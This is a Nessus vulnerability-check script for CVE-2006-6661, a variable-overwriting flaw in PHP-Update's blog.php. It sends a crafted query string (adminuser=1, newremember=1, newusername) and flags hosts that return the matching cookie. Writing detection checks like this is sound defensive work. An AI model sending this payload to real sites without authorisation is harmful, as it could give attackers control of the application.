#
# (C) Tenable Network Security
#


if (description)
{
  script_id(23927);
  script_version("$Revision: 1.4 $");

  script_cve_id("CVE-2006-6661");
  script_bugtraq_id(21658);
  script_xref(name:"OSVDB", value:"32360");
  script_xref(name:"OSVDB", value:"32361");

  script_name(english:"PHP-Update blog.php Variable Overwriting Vulnerability");
  script_summary(english:"Checks if variables can be overwritten with PHP-Update's blog.php");

  desc = "
Synopsis :

The remote web server contains a PHP script that is affected by a data
modification vulnerability. 

Description :

The remote host is running PHP-Update, a content management system
written in PHP. 

The version of PHP-Update installed on the remote host fails to
sanitize user-supplied arguments to the 'blog.php' script before
importing them into the global symbol table.  By leveraging this flaw,
an unauthenticated remote attacker can gain control of the application
and possibly execute arbitrary code on the remote host, subject to the
permissions of the web server user id. 

See also :

http://www.milw0rm.com/exploits/2953

Solution :

Unknown at this time.

Risk factor :

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";
  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2006-2008 Tenable Network Security");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Loop through directories.
if (thorough_tests) dirs = make_list("/phpupdate", "/phpu", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  # If we can overwrite the variables, this request will set a cookie.
  req = http_get(
    item:string(
      dir, "/blog.php?",
      "f=&",
      "newmessage=&",
      "newremember=1&",
      "adminuser=1&",
      "newusername=", SCRIPT_NAME
    ), 
    port:port
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
  if (res == NULL) exit(0);

  # There's a problem if we could set the user cookie.
  if (string("Set-Cookie: blogcookie[user]=", SCRIPT_NAME) >< res) {
    security_hole(port);
    exit(0);
  }
}
